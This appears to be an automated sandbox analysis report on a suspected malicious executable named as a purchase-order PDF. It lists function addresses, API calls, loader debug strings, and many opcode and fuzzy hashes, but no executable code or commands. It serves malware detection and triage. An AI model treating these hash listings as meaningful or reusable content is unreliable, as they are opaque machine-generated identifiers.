String ID: TJiq$Tedq$xbgq
API String ID: 0-1882855624
Opcode ID: 1fca3fb7d7836c8b46a618247c98a2a7b6761f66d3ead97a2147dd2ecd4fdd48
Instruction ID: ada99d114ff3c26677df1f9468757fd57f69ecef66cf2ac8c4ebe45bb549ea1d
Opcode Fuzzy Hash: 1fca3fb7d7836c8b46a618247c98a2a7b6761f66d3ead97a2147dd2ecd4fdd48
Instruction Fuzzy Hash: 00C174B5E006288FDB58DF6AD9446DDBBF2BF88301F14C1A9D809AB365DB305A85CF50

Function 07982A78 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

4'dq, xrefs: 07982B5A

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: 4'dq
API String ID: 0-1167855494
Opcode ID: 83ddad84f8ef287fd3c787405510391e7e77e78683eeb3755229ce63ce7d778c
Instruction ID: ca5d61a73d0929fc1dddd898c578258e6180583626e1a8c2251795b7eb5b19d9
Opcode Fuzzy Hash: 83ddad84f8ef287fd3c787405510391e7e77e78683eeb3755229ce63ce7d778c
Instruction Fuzzy Hash: A66109B0A002198FDB48DF6EE88569ABFF3FBC8304F14D569D019AB364EB785845CB51

Function 07982A88 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4'dq, xrefs: 07982B5A

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: 4'dq
API String ID: 0-1167855494
Opcode ID: 56c4c011bdc134883b9e1e22065d7a34c64ffab273f6ee46bf3e4d388cf7dbf2
Instruction ID: f13b8b07bc41d9f724a4de0da99c76af6dc6eff43266afb2fce15c9cddc9be01
Opcode Fuzzy Hash: 56c4c011bdc134883b9e1e22065d7a34c64ffab273f6ee46bf3e4d388cf7dbf2
Instruction Fuzzy Hash: 786107B0E002198BDB48DF6EE94569ABFF3FBC8304F14D569D019AB2A4EB785845CB50

Function 0798D680 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e563a447cfb38a9435c3865ad97e1a7101a082f859adc12e7653a59cd993f4
Instruction ID: 5183e2026673e15fb1ec9f18b63e0750b93f901e186729b8a2ac7d8f36e16981
Opcode Fuzzy Hash: f3e563a447cfb38a9435c3865ad97e1a7101a082f859adc12e7653a59cd993f4
Instruction Fuzzy Hash: 1AE1E6B4E041198FCB14DFA9C580AAEFBB2FF89315F2481A9D814AB355D735AD42CF60

Function 0798F5C8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb4bffb0cd3e976eb95f3f96c2640ed148cc46ba14c8ba9dd70f2e392b50c39c
Instruction ID: 1efab4a9a799d53da881713dcbdb0514a268eb2972bc95e15f32b6ce2fd12006
Opcode Fuzzy Hash: bb4bffb0cd3e976eb95f3f96c2640ed148cc46ba14c8ba9dd70f2e392b50c39c
Instruction Fuzzy Hash: 8CE1F8B4E001198FDB14DFA9C580AAEFBB2FF89305F2491A9D814AB355D735AD42CF60

Function 0798F190 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4aa3e6faf2099eac0b0fdf3f4afe361139d66db1e6b894d4318d99c679afe08
Instruction ID: 3bfa35dfa3ad508fd164b33e58dfa2af50ddbb97f4a0258c9143fd2bacd6516a
Opcode Fuzzy Hash: b4aa3e6faf2099eac0b0fdf3f4afe361139d66db1e6b894d4318d99c679afe08
Instruction Fuzzy Hash: BCE1E8B4E041198FCB14DFA9C584AAEFBB2FF89305F249169D814AB355D734AD82CF60

Function 0798DEF0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f75a7c973746d5cf08a6f88c62f0643dfca615882c9c5732d274c944f5a6b7f
Instruction ID: 8268651d5d851af7514ed73a6068301d29f739a445186c316faec842b7d8129a
Opcode Fuzzy Hash: 8f75a7c973746d5cf08a6f88c62f0643dfca615882c9c5732d274c944f5a6b7f
Instruction Fuzzy Hash: 1DE107B4E041198FCB14DFA9C590AAEFBB2FF89305F2481A9D814AB355D735AD42CF60

Function 0798DAB8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cada6e93a97cc8495e4471423cbbd3549e0577a38723296995318c8acabd122
Instruction ID: c4c73e68d481c12cad5dfc008c8e1ed46cff4410c4d7c8e34a8621a64e9951e7
Opcode Fuzzy Hash: 5cada6e93a97cc8495e4471423cbbd3549e0577a38723296995318c8acabd122
Instruction Fuzzy Hash: 78E1E8B4E041198FCB14DFA9C580AAEFBB2FF89315F248169D814AB356D734AD41CFA0

Function 058160B7 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755799822.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9031987eec6a5e035bf37717e106ed527383d52d8271baa9e10b859c9839d9e6
Instruction ID: 5fbc2fac85085167232ed8e78cae6e6a6617f534b014e6384536a92d425774b7
Opcode Fuzzy Hash: 9031987eec6a5e035bf37717e106ed527383d52d8271baa9e10b859c9839d9e6
Instruction Fuzzy Hash: ACD1D931D2075A8ACB11EB68D9946ADF771FF95300F21DB9AE00A37214EFB06AD4CB51

Function 058160C8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1755799822.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5810000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcc554aeaea7e249db19a8c49a763c6e9574fbd8723e16d3a22c6a767e0f404e
Instruction ID: f16814a2213b8b4d7f3278ebd16b5193e2b4f3083e0322c4aabccdba2e50f57b
Opcode Fuzzy Hash: fcc554aeaea7e249db19a8c49a763c6e9574fbd8723e16d3a22c6a767e0f404e
Instruction Fuzzy Hash: 1AD1D831D2075A8ACB11EB68D994699F771FF95200F21DB9AE00A37214EFB06AD4CB51

Function 07985298 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bde7b2a9ddc4565ad5def7b9bb5f28f2de0fbbf62755821607802940fea60671
Instruction ID: ed767dc4e060e86bee7e0c7920fad5b88f31cdc00162b00849b7e0a2e5384de5
Opcode Fuzzy Hash: bde7b2a9ddc4565ad5def7b9bb5f28f2de0fbbf62755821607802940fea60671
Instruction Fuzzy Hash: 627169B4E19209CFCF54DFA9D440AEEBBB6FF8A304F21902AD419A7211D7B4595ACF40

Function 0798DAA8 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1765460748.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae0d0df1ab88c88b467fd1ddc2fe3139b2f3e7cc7a57cf41abab584ce42636d
Instruction ID: 54fe4e4b350903f38a9708b2b96fe164057943730d70479d941be508600e8e14
Opcode Fuzzy Hash: cae0d0df1ab88c88b467fd1ddc2fe3139b2f3e7cc7a57cf41abab584ce42636d
Instruction Fuzzy Hash: D2510BB4E002198BDB14DFA9C5849AEFBF2FF89314F24C1A9D418AB355D7349941CFA0

Analysis Process: PO-0005082025 pdf.exePID: 7528, Parent PID: 7284COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	5.3%
Signature Coverage:	9%
Total number of Nodes:	133
Total number of Limit Nodes:	9

Executed Functions

Function 00417EB3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417F25

Memory Dump Source

Source File: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PO-0005082025 pdf.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54fb147e668d09699b38c2b31a46252e66a45ffa0a78401e78df278bd00db131
Instruction ID: 74b1a67ad7a1e6c5496c2b823323dd79b328b320fcbdb6ab911308b9a49c7e9b
Opcode Fuzzy Hash: 54fb147e668d09699b38c2b31a46252e66a45ffa0a78401e78df278bd00db131
Instruction Fuzzy Hash: 65011EB5E4020DABDF10DAA5DC42FDEB3B8AB54308F0041AAED0897241F675EB598B95

Function 0042CCC3 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCF7

Memory Dump Source

Source File: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PO-0005082025 pdf.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
Instruction ID: 7dd1565d8f3dbc3bc04d904a055674cb4cb7d7fe92152ebc39fafefd714ea547
Opcode Fuzzy Hash: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
Instruction Fuzzy Hash: A8E04F316006147BE610AA6ADC41FD7776CDFC5714F408419FA08A7181C670B91187F4

Function 01982B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01982B6A

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc3d688c0b955a063a5969feb3018bfcb8362d47620c2c3c4fea9c0641ccdcde
Instruction ID: afa99401afe53eef8c3d5ae555dc654668b1ce990bd3b89390feeba8c3b4adc4
Opcode Fuzzy Hash: bc3d688c0b955a063a5969feb3018bfcb8362d47620c2c3c4fea9c0641ccdcde
Instruction Fuzzy Hash: 31900261203504034605715C4418616804E97E1201B55C025E1058590DC52A89916229

Function 01982DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01982DFA

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e4b8ebbe464968644c401eeaf8dd560f5baa1b40674d0ac2a130cd0aee7c856
Instruction ID: 5e94db89906ec16af423fb82357e47a7ea0950bec20c1afcf252967b32f43ebe
Opcode Fuzzy Hash: 2e4b8ebbe464968644c401eeaf8dd560f5baa1b40674d0ac2a130cd0aee7c856
Instruction Fuzzy Hash: 8390023120250813D611715C4508707404D97D1241F95C416A0468558DD65B8A52A225

Function 01982C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01982C7A

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2f6cd40fa9eef01796a1927e0609b4ba8c3dba1c62f70be6431c80a14f9d26f6
Instruction ID: b0df72744652b7c31aaf92622abfe7fb6aebb94900d9c1cf9ab1b118f9517fe9
Opcode Fuzzy Hash: 2f6cd40fa9eef01796a1927e0609b4ba8c3dba1c62f70be6431c80a14f9d26f6
Instruction Fuzzy Hash: C390023120258C02D610715C840874A404997D1301F59C415A4468658DC69A89917225

Function 019835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019835CA

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0c939a93c28b8e75feb20c56ecad97798810c0564ebd9198a77f6635aa1a648
Instruction ID: 557956d374679bc0f0bbbf64abfedf452f7dee8df8cd1024f2f95341178e4442
Opcode Fuzzy Hash: c0c939a93c28b8e75feb20c56ecad97798810c0564ebd9198a77f6635aa1a648
Instruction Fuzzy Hash: 5A90023160660802D600715C4518706504997D1201F65C415A0468568DC79A8A5166A6

Function 004146F5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(--cG1-69-,00000111,00000000,00000000), ref: 00414780

Strings

--cG1-69-, xrefs: 00414787, 0041478A
--cG1-69-, xrefs: 00414773, 0041477F, 00414790

Memory Dump Source

Source File: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PO-0005082025 pdf.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: --cG1-69-$--cG1-69-
API String ID: 1836367815-2696456154
Opcode ID: c5b72e2f3fff9381100f87141ff93d0d4388590487560ee45dcfae67c73c8d0c
Instruction ID: 9cf80268f77044ef790c1c2abc85dc15f1fb4f0f00327b47cd463f739ad630b0
Opcode Fuzzy Hash: c5b72e2f3fff9381100f87141ff93d0d4388590487560ee45dcfae67c73c8d0c
Instruction Fuzzy Hash: C711C6B1E4431876EB11AB91DC02FDF7B789F41714F018059FE147B281D3B89A0687E9

Function 00414703 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(--cG1-69-,00000111,00000000,00000000), ref: 00414780

Strings

--cG1-69-, xrefs: 00414787, 0041478A
--cG1-69-, xrefs: 00414773, 0041477F, 00414790

Memory Dump Source

Source File: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PO-0005082025 pdf.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: --cG1-69-$--cG1-69-
API String ID: 1836367815-2696456154
Opcode ID: 2404142d2139fe2dc2d2998e8221aae8cf0b0789d09e28991ccc1465ef9f64a5
Instruction ID: d188dead4f36383fb44ff5ed79d53b29f72580d310d15dc5f7dee60383c7666d
Opcode Fuzzy Hash: 2404142d2139fe2dc2d2998e8221aae8cf0b0789d09e28991ccc1465ef9f64a5
Instruction Fuzzy Hash: E001C871E4021876DB11A7919C02FDF7B7C9F41714F008059FF147B2C1D6B85A0687A9

Function 004146B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(--cG1-69-,00000111,00000000,00000000), ref: 00414780

Strings

--cG1-69-, xrefs: 00414787, 0041478A
--cG1-69-, xrefs: 00414773, 0041477F, 00414790

Memory Dump Source

Source File: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PO-0005082025 pdf.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: --cG1-69-$--cG1-69-
API String ID: 1836367815-2696456154
Opcode ID: 0e1a7b9e5055d6e9a235eee43e9c21683ed9dd1a924f13b984badc4505965b4e
Instruction ID: a2084ebda050bdff8e3395dbdaee04fa0238bf01014c37db4853ee82cf069130
Opcode Fuzzy Hash: 0e1a7b9e5055d6e9a235eee43e9c21683ed9dd1a924f13b984badc4505965b4e
Instruction Fuzzy Hash: 6D014CB1D4530475E72197A0AC02FEF7B689F82724F00419AFE20BB2C5C6785A4187AD

Function 0042D023 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,4E8B0446,00000007,00000000,00000004,00000000,00417735,000000F4), ref: 0042D062

Memory Dump Source

Source File: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PO-0005082025 pdf.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
Instruction ID: b1f67ff1680508f6b48a13b8e8d45400879f8c202f5ac700e6df5a6440d7a715
Opcode Fuzzy Hash: e3bcd0732160e3b6f71be127c7a65e4ca80d18ba13c7f5289b9116d8d7022430
Instruction Fuzzy Hash: B9E06D72604204BBD610EE59EC41F9B77ACDFC5714F004419FA08AB242D770B91086B8

Function 0042CFD3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041EC5B,?,?,00000000,?,0041EC5B,?,?,?), ref: 0042D00F

Memory Dump Source

Source File: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PO-0005082025 pdf.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
Instruction ID: 7b03c5464cd71f7b56b57a232ca469f330cc0886600393034a38dfef118b4b2f
Opcode Fuzzy Hash: 73b2d8e897333f4cbf0dabf0c85a12c2b34041909e0ddd2ad4c4f879b0146da9
Instruction Fuzzy Hash: 9AE09AB6700208BBD610EE59EC41F9B77ACEFC9710F004419FE09AB242D670B9108BB8

Function 0042D073 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,220AB2FE,?,?,220AB2FE), ref: 0042D0AA

Memory Dump Source

Source File: 00000006.00000002.2291605179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PO-0005082025 pdf.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 815f97d0ad3e5c06b9465586eede46200b738d80c520c3a1271a43bb1a3d3db6
Instruction ID: 46dd625dd64cb4bfb7d8af5c768814de95ff13fe0ff90786c18fe221300a3b06
Opcode Fuzzy Hash: 815f97d0ad3e5c06b9465586eede46200b738d80c520c3a1271a43bb1a3d3db6
Instruction Fuzzy Hash: 07E04F322002147BD510AA5ADC41FDBB7ACDBC5710F014419FA08A7182DAB0BA0187E4

Function 01982C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01982C24

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 027d32178a0435ad0977e20b44132e86b8b26ddd25450598ed125531e22185e0
Instruction ID: 5b0f52081c4d4733fb751602980a9f034584b4b957fee93a443d428cd56d2348
Opcode Fuzzy Hash: 027d32178a0435ad0977e20b44132e86b8b26ddd25450598ed125531e22185e0
Instruction Fuzzy Hash: 6AB09B71D025C5C5DF11F764460C717794477D1701F15C065D2074645F473DC1D1E275

Non-executed Functions

Function 019C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

MinimumStackCommitInBytes, xrefs: 019C2BB0
@, xrefs: 019C2B74
@, xrefs: 019C2942
GlobalFlag2, xrefs: 019C2FC0
MaxDeadActivationContexts, xrefs: 019C2D82
RaiseExceptionOnPossibleDeadlock, xrefs: 019C2579
minkernel\ntdll\ldrinit.c, xrefs: 019C3187
CFGOptions, xrefs: 019C2967
MaxLoaderThreads, xrefs: 019C24EC
ExecuteOptions, xrefs: 019C25A0
ShutdownFlags, xrefs: 019C24A1
UseImpersonatedDeviceMap, xrefs: 019C251C
DisableHeapLookaside, xrefs: 019C246D
LdrpInitializeExecutionOptions, xrefs: 019C317D
UnloadEventTraceDepth, xrefs: 019C24C0
Initializing the application verifier package failed with status 0x%08lx, xrefs: 019C3176
FrontEndHeapDebugOptions, xrefs: 019C2489
DisableExceptionChainValidation, xrefs: 019C275F
TracingFlags, xrefs: 019C2549
GlobalFlag, xrefs: 019C2F3F, 019C3059

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: cd3730a9dedb308a7feed1020f2b3b8ffec4669f255f8c5db433e2d51fcfda24
Instruction ID: 8cb89c777717e6a5040f1703828ca19638e8baefdbdddfe89c32c5496ecd0276
Opcode Fuzzy Hash: cd3730a9dedb308a7feed1020f2b3b8ffec4669f255f8c5db433e2d51fcfda24
Instruction Fuzzy Hash: A2924B71608342AFE721DF29C880B6BB7E8BB84B54F14492DFA98D7251D770E944CB93

Function 01978620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B54CE
Thread is in a state in which it cannot own a critical section, xrefs: 019B5543
8, xrefs: 019B52E3
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B54E2
Critical section debug info address, xrefs: 019B541F, 019B552E
Critical section address., xrefs: 019B5502
Invalid debug info address of this critical section, xrefs: 019B54B6
undeleted critical section in freed memory, xrefs: 019B542B
corrupted critical section, xrefs: 019B54C2
Critical section address, xrefs: 019B5425, 019B54BC, 019B5534
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019B540A, 019B5496, 019B5519
double initialized or corrupted critical section, xrefs: 019B5508
Address of the debug info found in the active list., xrefs: 019B54AE, 019B54FA
Thread identifier, xrefs: 019B553A

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 29b9a771af36ff33b00e2f5e763928a648a4693497738b802508e7196d6b38b4
Instruction ID: f59bd7c4582975ed92c72bade9d7d67511cee92293280a04c94f0ab80f5adafa
Opcode Fuzzy Hash: 29b9a771af36ff33b00e2f5e763928a648a4693497738b802508e7196d6b38b4
Instruction Fuzzy Hash: D0817AB0A01358AFEB20CF99C985FAEBBF9BB88B15F114159F50CB7250D3B5A941CB50

Function 019729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

@, xrefs: 019B259B
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 019B2602
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019B25EB
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 019B2624
RtlpResolveAssemblyStorageMapEntry, xrefs: 019B261F
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 019B2409
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 019B2506
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019B24C0
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 019B2498
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019B22E4
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 019B2412

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 7050ef8442b7dd724dd0fe2527fe9cf9e9ee87e488ad3364b8a2367cc5bd6726
